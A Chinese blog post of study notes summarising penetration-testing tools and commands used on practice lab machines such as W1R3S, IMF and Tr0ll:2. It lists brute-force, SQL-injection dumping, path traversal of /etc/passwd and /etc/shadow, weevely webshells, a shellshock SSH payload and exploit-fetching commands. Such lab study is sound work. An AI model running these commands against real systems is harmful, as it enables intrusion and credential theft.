2020年1月12日 阶段总结

2020年1月12日 阶段总结

工具

nmap
nmap -sP 192.168.31.0/24  

-sP开关(Arp ping)执行PING命令,扫描IP段开启的主机

nmap -sS -sV -T5 -A -p- 192.168.31.69

-sS :半开放扫描(非3次握手的tcp扫描),它不打开一个完全的TCP连接,执行得很快,效率高

-sV:版本检测(sV),用来扫描目标主机和端口上运行的软件的版本

-A: -A综合扫描,包括系统探测,版本探测,脚本扫描,路由跟踪

-T: 时间优化(0-5)(paranoid|sneaky|polite|normal|aggressive|insane)

-p-: 从端口1扫描到65535

dirb

目录爆破工具

dirb http://192.168.31.69 -X .php,.txt,.zip,.html
dirb http://192.168.31.69 
hydra

密码爆破工具

hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.31.69 -s 55006 pop3

使用user.txt用户名,fasttrack.txt密码字典对 55006端口进行爆破

hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.31.78  -t 4 #爆破ssh密码
netcat
nc 192.168.31.69 55007  #访问端口
nc -lnvp 1234  #监听端口

传输文件:

nc -l -p 4444>derp.pcap  #接收端
nc 192.168.31.77 4444 < derpissues.pcap #发送端  31.77是目的地址
python
python -c 'import pty; pty.spawn("/bin/bash")' #获取tty
python -m SimpleHTTPServer 5678  #开启一个http服务
wget http://192.168.31.77:5678/37292.c  #下载文件
wpscan

web漏洞扫描工具,

wpscan --url http://192.168.31.78/wordpress
wpscan --url http://192.168.31.78/wordpress/ --enumerate u #扫描用户
wpscan --url  'http://derpnstink.local/weblog/' --api-token xxxxxxx #现在需要  api-token
cewl

通过爬行网站获取关键信息创建一个密码字典

cewl http://192.168.145.148:1898/?q=node/1 -w pass.txt
sqlmap
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch #收集数据库
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  --tables  --risk=3 --level=5 --threads=4 --batch  #收集数据表
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  -T Users --columns  --risk=3 --level=5 --threads=4 --batch  #收集字段
sqlmap -u 'http://192.168.31.95:1337/978345210/index.php' --forms -D Webapp  -T Users -C id,username,password --dump --batch  #收集数据
curl

curl是一个命令行工具,可用于在网络上传输数据。

它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。

在调试网络请求时,curl是您可以找到的最佳工具之一

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php #出现在靶机W1R3S 
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php
weevely
weevely generate jesse biu.php #生成php文件,出现在靶机IMF
weevely  http://192.168.31.233/imfadministrator/uploads/7652164f4a67.gif jesse  #利用 weevely链接木马
fcrackzip

破解压缩包的密码

fcrackzip -u -D -p out.txt lmao.zip
john

开膛手john 破解密码

john pass.hash --wordlist =/usr/share/wordlists/rockyou.txt
john pass.hash --show
MSF
WireShark

常用 wireshark 分析pcap文件

Burpsuite

常用方法

使用域名访问

修改 /etc/hosts文件

MySql数据库

一般在 /var/www/html/网站/ 下会找到mysql的配置文件

mysql

mysql -u root -p  #登录数据库
show databases    #显示数据库
use   xxxx数据库   #选择使用的数据库
show tables      #显示表
select * from 表   #显示数据
select version()  #查看数据版本
ps aux | grep root,查看到当前以root用户身份运行的所有进程。
gcc编译
gcc -g -c 1518.c
gcc -g -shared -o biu.so 1518.o -lc

-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名

FTP登录
ftp 192.168.31.80

ftp 允许使用匿名登录时可以直接使用anonymous 登录

SSH登录
ssh   user@192.168.31.80
ssh noob@192.168.31.124 -i noob -t "() { :; }; /bin/bash" #利用外壳拿登录权限 靶机:Tr0ll:2
ssh -i key.txt stinky@192.168.31.147 #使用密钥登录
file
file   filename   #使用file查看文件类型
端口碰撞
nmap -r -Pn -p 1,2,3 192.168.31.95  #出现在靶机LordOfTheRoot
knock敲门

靶机:IMF

提权方法

利用 cms或网站漏洞提权

使用google搜索 cms版本存在的漏洞

靶机:GoldenEye,Raven1,Lampiao,W1R3S ,DerpNStink

利用系统版本漏洞提权

使用google 直接搜索系统版本

靶机:Tr0ll:1,LordOfTheRoot

利用缓冲区溢出提权

靶机:LordOfTheRoot,IMF,Tr0ll:2

利用数据库漏洞提权

靶机:LordOfTheRoot

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值